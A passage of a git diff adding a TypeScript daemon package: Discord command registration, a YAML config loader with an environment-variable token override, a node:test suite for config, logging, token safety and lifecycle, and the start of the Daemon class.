+ */
+export async function registerGuildCommands(
+  rest: REST,
+  clientId: string,
+  guildId: string,
+  commands: RESTPostAPIChatInputApplicationCommandsJSONBody[],
+  logger?: Logger,
+): Promise<boolean> {
+  try {
+    await rest.put(
+      Routes.applicationGuildCommands(clientId, guildId),
+      { body: commands },
+    );
+    logger?.info('commands registered', { count: commands.length, guildId });
+    return true;
+  } catch (err) {
+    const message = err instanceof Error ? err.message : String(err);
+    logger?.warn('command registration failed', {
+      guildId,
+      error: message,
+    });
+    return false;
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Status formatting
+// ---------------------------------------------------------------------------
+
+/**
+ * Format session list for /gsd-status reply.
+ * Shows projectName, status, duration, and cost for each session.
+ * Returns 'No active sessions.' if the array is empty.
+ */
+export function formatSessionStatus(sessions: ManagedSession[]): string {
+  if (sessions.length === 0) {
+    return 'No active sessions.';
+  }
+
+  const lines = sessions.map((s) => {
+    const durationMs = Date.now() - s.startTime;
+    const durationMin = Math.floor(durationMs / 60_000);
+    const cost = s.cost.totalCost.toFixed(4);
+    return `• **${s.projectName}** — ${s.status} (${durationMin}m, $${cost})`;
+  });
+
+  return lines.join('\n');
+}
diff --git a/packages/daemon/src/config.ts b/packages/daemon/src/config.ts
new file mode 100644
index 000000000..c1dddbbd6
--- /dev/null
+++ b/packages/daemon/src/config.ts
@@ -0,0 +1,137 @@
+import { readFileSync, existsSync } from 'node:fs';
+import { homedir } from 'node:os';
+import { resolve } from 'node:path';
+import { parse as parseYaml } from 'yaml';
+import type { DaemonConfig, LogLevel } from './types.js';
+
+const VALID_LOG_LEVELS: ReadonlySet<string> = new Set(['debug', 'info', 'warn', 'error']);
+
+/** Expand leading ~ to the user's home directory. */
+function expandTilde(p: string): string {
+  if (p.startsWith('~/') || p === '~') {
+    return resolve(homedir(), p.slice(2) || '.');
+  }
+  return p;
+}
+
+/** Default config values when no file is present or fields are missing. */
+function defaults(): DaemonConfig {
+  return {
+    discord: undefined,
+    projects: { scan_roots: [] },
+    log: {
+      file: resolve(homedir(), '.gsd', 'daemon.log'),
+      level: 'info',
+      max_size_mb: 50,
+    },
+  };
+}
+
+/**
+ * Resolve the config file path.
+ * Priority: explicit CLI arg → GSD_DAEMON_CONFIG env → ~/.gsd/daemon.yaml
+ */
+export function resolveConfigPath(cliPath?: string): string {
+  if (cliPath) return expandTilde(cliPath);
+  const envPath = process.env['GSD_DAEMON_CONFIG'];
+  if (envPath) return expandTilde(envPath);
+  return resolve(homedir(), '.gsd', 'daemon.yaml');
+}
+
+/**
+ * Validate and normalise a raw parsed object into a DaemonConfig.
+ * Missing/invalid fields are filled with defaults. Invalid log level falls back to 'info'.
+ */
+export function validateConfig(raw: unknown): DaemonConfig {
+  const def = defaults();
+
+  if (raw == null || typeof raw !== 'object') return def;
+  const obj = raw as Record<string, unknown>;
+
+  // --- discord ---
+  let discord: DaemonConfig['discord'] = undefined;
+  if (obj['discord'] != null && typeof obj['discord'] === 'object') {
+    const d = obj['discord'] as Record<string, unknown>;
+    discord = {
+      token: typeof d['token'] === 'string' ? d['token'] : '',
+      guild_id: typeof d['guild_id'] === 'string' ? d['guild_id'] : '',
+      owner_id: typeof d['owner_id'] === 'string' ? d['owner_id'] : '',
+      ...(typeof d['dm_on_blocker'] === 'boolean' ? { dm_on_blocker: d['dm_on_blocker'] } : {}),
+      ...(typeof d['control_channel_id'] === 'string' ? { control_channel_id: d['control_channel_id'] } : {}),
+    };
+
+    // Parse orchestrator sub-block
+    if (d['orchestrator'] != null && typeof d['orchestrator'] === 'object') {
+      const orc = d['orchestrator'] as Record<string, unknown>;
+      discord.orchestrator = {
+        ...(typeof orc['model'] === 'string' ? { model: orc['model'] } : {}),
+        ...(typeof orc['max_tokens'] === 'number' && orc['max_tokens'] > 0 ? { max_tokens: orc['max_tokens'] } : {}),
+      };
+    }
+  }
+
+  // --- projects ---
+  let scanRoots: string[] = [];
+  if (obj['projects'] != null && typeof obj['projects'] === 'object') {
+    const p = obj['projects'] as Record<string, unknown>;
+    if (Array.isArray(p['scan_roots'])) {
+      scanRoots = (p['scan_roots'] as unknown[])
+        .filter((s): s is string => typeof s === 'string')
+        .map(expandTilde);
+    }
+  }
+
+  // --- log ---
+  let logFile = def.log.file;
+  let logLevel: LogLevel = def.log.level;
+  let maxSizeMb = def.log.max_size_mb;
+
+  if (obj['log'] != null && typeof obj['log'] === 'object') {
+    const l = obj['log'] as Record<string, unknown>;
+    if (typeof l['file'] === 'string') logFile = expandTilde(l['file']);
+    if (typeof l['level'] === 'string') {
+      logLevel = VALID_LOG_LEVELS.has(l['level']) ? (l['level'] as LogLevel) : 'info';
+    }
+    if (typeof l['max_size_mb'] === 'number' && l['max_size_mb'] > 0) {
+      maxSizeMb = l['max_size_mb'];
+    }
+  }
+
+  // --- env override: DISCORD_BOT_TOKEN ---
+  const envToken = process.env['DISCORD_BOT_TOKEN'];
+  if (envToken) {
+    if (!discord) {
+      discord = { token: envToken, guild_id: '', owner_id: '' };
+    } else {
+      discord = { ...discord, token: envToken };
+    }
+  }
+
+  return {
+    discord,
+    projects: { scan_roots: scanRoots },
+    log: { file: logFile, level: logLevel, max_size_mb: maxSizeMb },
+  };
+}
+
+/**
+ * Load and validate a DaemonConfig from a YAML file.
+ * If the file doesn't exist, returns defaults. If the file is malformed YAML, throws.
+ */
+export function loadConfig(configPath: string): DaemonConfig {
+  if (!existsSync(configPath)) {
+    // Still apply env-var overrides even when file is missing
+    return validateConfig(null);
+  }
+
+  const raw = readFileSync(configPath, 'utf-8');
+  let parsed: unknown;
+  try {
+    parsed = parseYaml(raw);
+  } catch (err: unknown) {
+    const msg = err instanceof Error ? err.message : String(err);
+    throw new Error(`Failed to parse YAML config at ${configPath}: ${msg}`);
+  }
+
+  return validateConfig(parsed);
+}
diff --git a/packages/daemon/src/daemon.test.ts b/packages/daemon/src/daemon.test.ts
new file mode 100644
index 000000000..8519bcaf7
--- /dev/null
+++ b/packages/daemon/src/daemon.test.ts
@@ -0,0 +1,763 @@
+import { describe, it, afterEach, before, after } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, writeFileSync, readFileSync, rmSync, existsSync, mkdirSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir, homedir } from 'node:os';
+import { randomUUID } from 'node:crypto';
+import { execFileSync, spawn } from 'node:child_process';
+import { fileURLToPath } from 'node:url';
+import { dirname } from 'node:path';
+import { resolveConfigPath, loadConfig, validateConfig } from './config.js';
+import { Logger } from './logger.js';
+import { Daemon } from './daemon.js';
+import { SessionManager } from './session-manager.js';
+import type { DaemonConfig, LogEntry } from './types.js';
+
+// ---------- helpers ----------
+
+function tmpDir(): string {
+  return mkdtempSync(join(tmpdir(), `daemon-test-${randomUUID().slice(0, 8)}-`));
+}
+
+const cleanupDirs: string[] = [];
+afterEach(() => {
+  while (cleanupDirs.length) {
+    const d = cleanupDirs.pop()!;
+    if (existsSync(d)) rmSync(d, { recursive: true, force: true });
+  }
+});
+
+// ---------- config ----------
+
+describe('resolveConfigPath', () => {
+  it('prefers explicit CLI path', () => {
+    const p = resolveConfigPath('/custom/config.yaml');
+    assert.equal(p, '/custom/config.yaml');
+  });
+
+  it('expands ~ in CLI path', () => {
+    const p = resolveConfigPath('~/my-daemon.yaml');
+    assert.ok(p.startsWith(homedir()));
+    assert.ok(p.endsWith('my-daemon.yaml'));
+  });
+
+  it('falls back to GSD_DAEMON_CONFIG env var', () => {
+    const prev = process.env['GSD_DAEMON_CONFIG'];
+    try {
+      process.env['GSD_DAEMON_CONFIG'] = '/env/path.yaml';
+      const p = resolveConfigPath();
+      assert.equal(p, '/env/path.yaml');
+    } finally {
+      if (prev === undefined) delete process.env['GSD_DAEMON_CONFIG'];
+      else process.env['GSD_DAEMON_CONFIG'] = prev;
+    }
+  });
+
+  it('defaults to ~/.gsd/daemon.yaml', () => {
+    const prev = process.env['GSD_DAEMON_CONFIG'];
+    try {
+      delete process.env['GSD_DAEMON_CONFIG'];
+      const p = resolveConfigPath();
+      assert.equal(p, join(homedir(), '.gsd', 'daemon.yaml'));
+    } finally {
+      if (prev !== undefined) process.env['GSD_DAEMON_CONFIG'] = prev;
+    }
+  });
+});
+
+describe('loadConfig', () => {
+  // Save and clear DISCORD_BOT_TOKEN for this suite — env override interferes with file-token assertions
+  let savedToken: string | undefined;
+  before(() => {
+    savedToken = process.env['DISCORD_BOT_TOKEN'];
+    delete process.env['DISCORD_BOT_TOKEN'];
+  });
+  afterEach(() => {}); // cleanup dirs handled by top-level afterEach
+  // Restore after all tests in this suite
+  after(() => {
+    if (savedToken !== undefined) process.env['DISCORD_BOT_TOKEN'] = savedToken;
+  });
+
+  it('parses valid YAML config', () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const configPath = join(dir, 'daemon.yaml');
+    writeFileSync(configPath, `
+discord:
+  token: "test-token-123"
+  guild_id: "g1"
+  owner_id: "o1"
+projects:
+  scan_roots:
+    - ~/projects
+    - /absolute/path
+log:
+  file: ~/logs/daemon.log
+  level: debug
+  max_size_mb: 100
+`);
+    const cfg = loadConfig(configPath);
+    assert.equal(cfg.discord?.token, 'test-token-123');
+    assert.equal(cfg.discord?.guild_id, 'g1');
+    assert.equal(cfg.log.level, 'debug');
+    assert.equal(cfg.log.max_size_mb, 100);
+    assert.ok(cfg.log.file.startsWith(homedir()));
+    assert.ok(cfg.projects.scan_roots[0]!.startsWith(homedir()));
+    assert.equal(cfg.projects.scan_roots[1], '/absolute/path');
+  });
+
+  it('returns defaults when config file is missing', () => {
+    const cfg = loadConfig('/nonexistent/path/daemon.yaml');
+    assert.equal(cfg.log.level, 'info');
+    assert.equal(cfg.log.max_size_mb, 50);
+    assert.ok(cfg.log.file.endsWith('daemon.log'));
+    assert.deepEqual(cfg.projects.scan_roots, []);
+    assert.equal(cfg.discord, undefined);
+  });
+
+  it('throws on malformed YAML', () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const configPath = join(dir, 'bad.yaml');
+    writeFileSync(configPath, ':\n  :\n    bad: [unclosed');
+    assert.throws(() => loadConfig(configPath), (err: unknown) => {
+      assert.ok(err instanceof Error);
+      assert.ok(err.message.includes('Failed to parse YAML'));
+      assert.ok(err.message.includes(configPath));
+      return true;
+    });
+  });
+
+  it('returns defaults for empty YAML file', () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const configPath = join(dir, 'empty.yaml');
+    writeFileSync(configPath, '');
+    const cfg = loadConfig(configPath);
+    assert.equal(cfg.log.level, 'info');
+    assert.equal(cfg.log.max_size_mb, 50);
+    assert.deepEqual(cfg.projects.scan_roots, []);
+  });
+});
+
+describe('validateConfig', () => {
+  // Save and clear DISCORD_BOT_TOKEN for tests that don't expect it
+  let savedToken: string | undefined;
+  before(() => {
+    savedToken = process.env['DISCORD_BOT_TOKEN'];
+    delete process.env['DISCORD_BOT_TOKEN'];
+  });
+  after(() => {
+    if (savedToken !== undefined) process.env['DISCORD_BOT_TOKEN'] = savedToken;
+  });
+
+  it('fills remaining defaults for partial config', () => {
+    const cfg = validateConfig({ projects: { scan_roots: ['/a'] } });
+    assert.equal(cfg.log.level, 'info');
+    assert.equal(cfg.log.max_size_mb, 50);
+    assert.ok(cfg.log.file.endsWith('daemon.log'));
+    assert.deepEqual(cfg.projects.scan_roots, ['/a']);
+    assert.equal(cfg.discord, undefined);
+  });
+
+  it('falls back to info for invalid log level', () => {
+    const cfg = validateConfig({ log: { level: 'trace' } });
+    assert.equal(cfg.log.level, 'info');
+  });
+
+  it('returns full defaults for null input', () => {
+    const cfg = validateConfig(null);
+    assert.equal(cfg.log.level, 'info');
+    assert.equal(cfg.log.max_size_mb, 50);
+  });
+
+  it('returns full defaults for non-object input', () => {
+    const cfg = validateConfig('not-an-object');
+    assert.equal(cfg.log.level, 'info');
+  });
+
+  it('expands ~ in log file path', () => {
+    const cfg = validateConfig({ log: { file: '~/my.log' } });
+    assert.ok(cfg.log.file.startsWith(homedir()));
+    assert.ok(cfg.log.file.endsWith('my.log'));
+  });
+
+  it('overrides discord token from DISCORD_BOT_TOKEN env var', () => {
+    const prev = process.env['DISCORD_BOT_TOKEN'];
+    try {
+      process.env['DISCORD_BOT_TOKEN'] = 'env-override-token';
+      const cfg = validateConfig({
+        discord: { token: 'file-token', guild_id: 'g1', owner_id: 'o1' },
+      });
+      assert.equal(cfg.discord?.token, 'env-override-token');
+      assert.equal(cfg.discord?.guild_id, 'g1');
+    } finally {
+      if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN'];
+      else process.env['DISCORD_BOT_TOKEN'] = prev;
+    }
+  });
+
+  it('creates discord block from env var even when absent in config', () => {
+    const prev = process.env['DISCORD_BOT_TOKEN'];
+    try {
+      process.env['DISCORD_BOT_TOKEN'] = 'env-only-token';
+      const cfg = validateConfig({});
+      assert.equal(cfg.discord?.token, 'env-only-token');
+    } finally {
+      if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN'];
+      else process.env['DISCORD_BOT_TOKEN'] = prev;
+    }
+  });
+});
+
+// ---------- logger ----------
+
+describe('Logger', () => {
+  it('writes JSON-lines entries to file', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'test.log');
+
+    const logger = new Logger({ filePath: logPath, level: 'debug' });
+    logger.info('hello world');
+    logger.debug('detail', { key: 'val' });
+    await logger.close();
+
+    const lines = readFileSync(logPath, 'utf-8').trim().split('\n');
+    assert.equal(lines.length, 2);
+
+    const entry0: LogEntry = JSON.parse(lines[0]!);
+    assert.equal(entry0.level, 'info');
+    assert.equal(entry0.msg, 'hello world');
+    assert.ok(entry0.ts); // ISO-8601
+
+    const entry1: LogEntry = JSON.parse(lines[1]!);
+    assert.equal(entry1.level, 'debug');
+    assert.equal(entry1.msg, 'detail');
+    assert.deepEqual(entry1.data, { key: 'val' });
+  });
+
+  it('filters entries below configured level', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'filter.log');
+
+    const logger = new Logger({ filePath: logPath, level: 'warn' });
+    logger.debug('should not appear');
+    logger.info('should not appear either');
+    logger.warn('visible warning');
+    logger.error('visible error');
+    await logger.close();
+
+    const lines = readFileSync(logPath, 'utf-8').trim().split('\n');
+    assert.equal(lines.length, 2);
+    assert.equal((JSON.parse(lines[0]!) as LogEntry).level, 'warn');
+    assert.equal((JSON.parse(lines[1]!) as LogEntry).level, 'error');
+  });
+
+  it('close() resolves after stream ends', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'close.log');
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    logger.info('before close');
+    await logger.close();
+
+    // File should be readable and contain the entry
+    const content = readFileSync(logPath, 'utf-8');
+    assert.ok(content.includes('before close'));
+  });
+
+  it('creates parent directories if they do not exist', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'nested', 'deep', 'test.log');
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    logger.info('nested dir test');
+    await logger.close();
+
+    assert.ok(existsSync(logPath));
+    const content = readFileSync(logPath, 'utf-8');
+    assert.ok(content.includes('nested dir test'));
+  });
+
+  it('does not include data field when not provided', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'nodata.log');
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    logger.info('no extra data');
+    await logger.close();
+
+    const entry: LogEntry = JSON.parse(readFileSync(logPath, 'utf-8').trim());
+    assert.equal(entry.data, undefined);
+    // Also verify the raw JSON doesn't contain "data" key
+    assert.ok(!readFileSync(logPath, 'utf-8').includes('"data"'));
+  });
+});
+
+// ---------- token safety ----------
+
+describe('token safety', () => {
+  it('discord token never appears in log output', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'token-safety.log');
+
+    // Config with a token
+    const prev = process.env['DISCORD_BOT_TOKEN'];
+    try {
+      process.env['DISCORD_BOT_TOKEN'] = 'super-secret-token-value';
+      const cfg = validateConfig({});
+
+      const logger = new Logger({ filePath: logPath, level: 'debug' });
+      // Log the config object — token must not leak
+      logger.info('config loaded', { discord_configured: !!cfg.discord });
+      logger.debug('startup complete');
+      await logger.close();
+
+      const content = readFileSync(logPath, 'utf-8');
+      assert.ok(!content.includes('super-secret-token-value'));
+    } finally {
+      if (prev === undefined) delete process.env['DISCORD_BOT_TOKEN'];
+      else process.env['DISCORD_BOT_TOKEN'] = prev;
+    }
+  });
+});
+
+// ---------- daemon lifecycle ----------
+
+// Resolve the dist/ directory for spawning CLI
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+describe('Daemon', () => {
+  it('logs lifecycle events on start and shutdown', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'daemon-lifecycle.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: ['/a', '/b'] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+
+    // start() should have logged 'daemon started'
+    // shutdown() directly — we override process.exit to prevent test runner from dying
+    const origExit = process.exit;
+    let exitCode: number | undefined;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = (code?: number) => { exitCode = code ?? 0; };
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+
+    assert.equal(exitCode, 0);
+
+    const content = readFileSync(logPath, 'utf-8');
+    const lines = content.trim().split('\n');
+
+    // First line: daemon started
+    const startEntry: LogEntry = JSON.parse(lines[0]!);
+    assert.equal(startEntry.msg, 'daemon started');
+    assert.equal(startEntry.data?.scan_roots, 2);
+    assert.equal(startEntry.data?.discord_configured, false);
+
+    // Second line: daemon shutting down
+    const stopEntry: LogEntry = JSON.parse(lines[1]!);
+    assert.equal(stopEntry.msg, 'daemon shutting down');
+  });
+
+  it('shutdown is idempotent — second call is a no-op', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'idempotent.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+
+    const origExit = process.exit;
+    let exitCount = 0;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => { exitCount++; };
+    try {
+      await daemon.shutdown();
+      await daemon.shutdown(); // second call — should be no-op
+    } finally {
+      process.exit = origExit;
+    }
+
+    assert.equal(exitCount, 1, 'process.exit should be called exactly once');
+
+    const lines = readFileSync(logPath, 'utf-8').trim().split('\n');
+    const shutdownLines = lines.filter(l => {
+      const e: LogEntry = JSON.parse(l);
+      return e.msg === 'daemon shutting down';
+    });
+    assert.equal(shutdownLines.length, 1, 'shutdown log should appear exactly once');
+  });
+});
+
+// ---------- Health heartbeat ----------
+
+describe('Health heartbeat', () => {
+  it('logs health entry with expected fields after interval tick', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'health.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    // Use 50ms interval for fast test
+    const daemon = new Daemon(config, logger, 50);
+
+    await daemon.start();
+
+    // Wait for at least one health tick
+    await new Promise((r) => setTimeout(r, 120));
+
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+
+    const content = readFileSync(logPath, 'utf-8');
+    const lines = content.trim().split('\n');
+    const healthLines = lines.filter((l) => {
+      const e: LogEntry = JSON.parse(l);
+      return e.msg === 'health';
+    });
+
+    assert.ok(healthLines.length >= 1, 'should have at least one health log entry');
+
+    const entry: LogEntry = JSON.parse(healthLines[0]!);
+    assert.equal(entry.msg, 'health');
+    assert.equal(typeof entry.data?.uptime_s, 'number');
+    assert.equal(typeof entry.data?.active_sessions, 'number');
+    assert.equal(typeof entry.data?.discord_connected, 'boolean');
+    assert.equal(typeof entry.data?.memory_rss_mb, 'number');
+    assert.equal(entry.data?.discord_connected, false); // no discord configured
+    assert.equal(entry.data?.active_sessions, 0); // no sessions
+  });
+
+  it('health timer is cleared on shutdown — no lingering intervals', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'health-cleanup.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    // Use 50ms interval
+    const daemon = new Daemon(config, logger, 50);
+
+    await daemon.start();
+
+    // Wait for one tick
+    await new Promise((r) => setTimeout(r, 80));
+
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+
+    // Count health entries at shutdown
+    const contentAtShutdown = readFileSync(logPath, 'utf-8');
+    const healthCountAtShutdown = contentAtShutdown
+      .trim()
+      .split('\n')
+      .filter((l) => JSON.parse(l).msg === 'health').length;
+
+    // Wait another interval — no new health entries should appear
+    await new Promise((r) => setTimeout(r, 120));
+
+    // Re-read (logger is closed, so file shouldn't change)
+    const contentAfterWait = readFileSync(logPath, 'utf-8');
+    const healthCountAfterWait = contentAfterWait
+      .trim()
+      .split('\n')
+      .filter((l) => JSON.parse(l).msg === 'health').length;
+
+    assert.equal(
+      healthCountAfterWait,
+      healthCountAtShutdown,
+      'no new health entries should appear after shutdown',
+    );
+  });
+});
+
+describe('CLI integration', () => {
+  it('--help prints usage and exits 0', () => {
+    const result = execFileSync(
+      process.execPath,
+      [join(__dirname, 'cli.js'), '--help'],
+      { encoding: 'utf-8', timeout: 5000 },
+    );
+    assert.ok(result.includes('Usage: gsd-daemon'));
+    assert.ok(result.includes('--config'));
+    assert.ok(result.includes('--verbose'));
+  });
+
+  it('starts, logs to file, and exits cleanly on SIGTERM', { timeout: 15000 }, async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'integration.log');
+    const configPath = join(dir, 'daemon.yaml');
+
+    writeFileSync(configPath, `
+projects:
+  scan_roots:
+    - /tmp/test-project
+log:
+  file: "${logPath}"
+  level: info
+  max_size_mb: 10
+`);
+
+    // Use execFile with a wrapper script approach: spawn, wait for start, SIGTERM, verify
+    const exitCode = await new Promise<number>((resolve, reject) => {
+      const child = spawn(
+        process.execPath,
+        [join(__dirname, 'cli.js'), '--config', configPath],
+        { stdio: 'ignore' },
+      );
+
+      let resolved = false;
+      child.on('error', (err) => { if (!resolved) { resolved = true; reject(err); } });
+      child.on('exit', (code) => { if (!resolved) { resolved = true; resolve(code ?? 1); } });
+
+      // Poll for startup, then send SIGTERM
+      const poll = setInterval(() => {
+        if (existsSync(logPath)) {
+          const content = readFileSync(logPath, 'utf-8');
+          if (content.includes('daemon started')) {
+            clearInterval(poll);
+            child.kill('SIGTERM');
+          }
+        }
+      }, 100);
+
+      // Safety: kill child if it takes too long
+      setTimeout(() => {
+        clearInterval(poll);
+        if (!resolved) {
+          child.kill('SIGKILL');
+          resolved = true;
+          reject(new Error('timed out waiting for daemon'));
+        }
+      }, 10000);
+    });
+
+    assert.equal(exitCode, 0, 'daemon should exit with code 0 on SIGTERM');
+
+    // Small delay for filesystem flush
+    await new Promise(r => setTimeout(r, 100));
+
+    // Verify log file contents
+    const finalContent = readFileSync(logPath, 'utf-8');
+    assert.ok(finalContent.includes('daemon started'), 'log should contain startup entry');
+    assert.ok(finalContent.includes('daemon shutting down'), 'log should contain shutdown entry');
+
+    // Verify log entries are valid JSON-lines
+    const lines = finalContent.trim().split('\n');
+    for (const line of lines) {
+      const entry: LogEntry = JSON.parse(line);
+      assert.ok(entry.ts, 'each entry should have a timestamp');
+      assert.ok(entry.level, 'each entry should have a level');
+      assert.ok(entry.msg, 'each entry should have a message');
+    }
+  });
+
+  it('exits with code 1 on invalid config', () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const configPath = join(dir, 'bad.yaml');
+    writeFileSync(configPath, ':\n  :\n    bad: [unclosed');
+
+    try {
+      execFileSync(
+        process.execPath,
+        [join(__dirname, 'cli.js'), '--config', configPath],
+        { encoding: 'utf-8', timeout: 5000 },
+      );
+      assert.fail('should have thrown');
+    } catch (err: unknown) {
+      // execFileSync throws on non-zero exit
+      const execErr = err as { status: number; stderr: string };
+      assert.equal(execErr.status, 1);
+      assert.ok(execErr.stderr.includes('fatal'));
+    }
+  });
+});
+
+// ---------- Daemon + SessionManager integration ----------
+
+describe('Daemon integration', () => {
+  it('getSessionManager() returns SessionManager after start()', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'daemon-sm.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+
+    const sm = daemon.getSessionManager();
+    assert.ok(sm instanceof SessionManager);
+
+    // Clean shutdown
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+  });
+
+  it('getSessionManager() throws before start()', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'daemon-nostart.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    const daemon = new Daemon(config, logger);
+
+    assert.throws(
+      () => daemon.getSessionManager(),
+      (err: Error) => {
+        assert.ok(err.message.includes('Daemon not started'));
+        return true;
+      }
+    );
+
+    // Close logger to prevent async write stream from hitting cleaned-up tmpdir
+    await logger.close();
+  });
+
+  it('scanProjects() delegates to scanForProjects with configured roots', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'daemon-scan.log');
+
+    // Create a fake project root with a project that has a .git marker
+    const scanRoot = join(dir, 'projects');
+    mkdirSync(scanRoot);
+    const projectDir = join(scanRoot, 'my-project');
+    mkdirSync(projectDir);
+    mkdirSync(join(projectDir, '.git'));
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [scanRoot] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+
+    const projects = await daemon.scanProjects();
+    assert.ok(projects.length >= 1);
+    const found = projects.find(p => p.name === 'my-project');
+    assert.ok(found);
+    assert.ok(found.markers.includes('git'));
+
+    // Clean shutdown
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+  });
+
+  it('shutdown cleans up sessionManager before closing logger', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'daemon-cleanup.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'info', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'info' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+
+    // Access sessionManager to verify it exists
+    const sm = daemon.getSessionManager();
+    assert.ok(sm);
+
+    // Shutdown — should not throw even though sessionManager has no active sessions
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+
+    // Verify log contains both started and shutting down
+    const content = readFileSync(logPath, 'utf-8');
+    assert.ok(content.includes('daemon started'));
+    assert.ok(content.includes('daemon shutting down'));
+  });
+});
diff --git a/packages/daemon/src/daemon.ts b/packages/daemon/src/daemon.ts
new file mode 100644
index 000000000..8b1db3db6
--- /dev/null
+++ b/packages/daemon/src/daemon.ts
@@ -0,0 +1,199 @@
+import type { DaemonConfig, ProjectInfo } from './types.js';
+import type { Logger } from './logger.js';
+import { SessionManager } from './session-manager.js';
+import { scanForProjects } from './project-scanner.js';
+import { DiscordBot, validateDiscordConfig } from './discord-bot.js';
+import { EventBridge } from './event-bridge.js';
+import { Orchestrator } from './orchestrator.js';
+
+/**
+ * Core daemon class — ties config + logger together with lifecycle management.
+ * Registers SIGTERM/SIGINT handlers for clean shutdown.
+ */
+export class Daemon {
+  private shuttingDown = false;
+  private keepaliveTimer: ReturnType<typeof setInterval> | undefined;
+  private healthTimer: ReturnType<typeof setInterval> | undefined;
+  private readonly onSigterm: () => void;
+  private readonly onSigint: () => void;
+  private sessionManager: SessionManager | undefined;
+  private discordBot: DiscordBot | undefined;
+  private eventBridge: EventBridge | undefined;
+  private orchestrator: Orchestrator | undefined;
+
+  constructor(
+    private readonly config: DaemonConfig,
+    private readonly logger: Logger,
+    private readonly healthIntervalMs: number = 300_000,
+  ) {
+    this.onSigterm = () => void this.shutdown();
+    this.onSigint = () => void this.shutdown();
+  }
+
